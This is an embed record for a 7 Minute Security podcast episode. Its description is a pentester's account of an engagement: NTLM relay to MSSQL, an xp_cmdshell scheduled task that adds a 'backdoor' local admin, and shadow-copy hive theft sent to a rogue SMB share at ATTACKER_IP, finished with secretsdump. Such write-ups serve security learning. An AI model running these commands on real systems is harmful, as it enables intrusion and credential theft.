{"version":1,"type":"rich","provider_name":"Libsyn","provider_url":"https:\/\/www.libsyn.com","height":90,"width":600,"title":"7MS #692: Tales of Pentest Pwnage \u2013 Part 76","description":"Happy Friday! Today\u2019s another hot pile of pentest pwnage. To make it easy on myself I\u2019m going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https:\/\/www.guidepointsecurity.com\/blog\/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques\/. I relayed the DA account to a SQL box that BloodHound said had a \u201csession\u201d from another DA. One part I can\u2019t explain is that the first relay got me a shell in the context of NT SERVICE\\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\\SYSTEM (!). The net command would let me add a new user, but BLOCKED me when I tried to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks \/create \/tn \"Maintenance\" \/tr \"net localgroup administrators backdoor \/add\" \/sc once \/st 12:00 \/ru SYSTEM \/f and then xp_cmdshell schtasks \/run \/tn \"Maintenance\". Turns out a DA wasn\u2019t interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP into the victim and create a shadow copy. That part went fine, but for the life of me I couldn\u2019t copy reg hives out of it \u2013 EDR was unhappy.
In the end, the bizarre combo of things that did the trick was:
Set up smbserver.py with username\/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!'
From the victim system, I did an mklink to the shadow copy: mklink \/d C:\\tempbackup \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy123\\
From a command prompt on the victim system, I authenticated to my rogue share: net use \\\\ATTACKER_IP\\share \/user:toteslegit DontMindMeLOL!
Then I did a copy command for the first hive: copy SYSTEM \\\\my.attackingip\\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However\u2026 the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but the copy completed!!!111!!!!!
Finishing move: secretsdump -sam sam.test -system sys.test LOCAL","author_name":"7 Minute Security","author_url":"https:\/\/7MinSec.com","html":"<iframe title=\"Libsyn Player\" style=\"border: none\" src=\"\/\/html5-player.libsyn.com\/embed\/episode\/id\/38192630\/height\/90\/theme\/custom\/thumbnail\/yes\/direction\/forward\/render-playlist\/no\/custom-color\/88AA3C\/\" height=\"90\" width=\"600\" scrolling=\"no\"  allowfullscreen webkitallowfullscreen mozallowfullscreen oallowfullscreen msallowfullscreen><\/iframe>","thumbnail_url":"https:\/\/assets.libsyn.com\/secure\/item\/38192630"}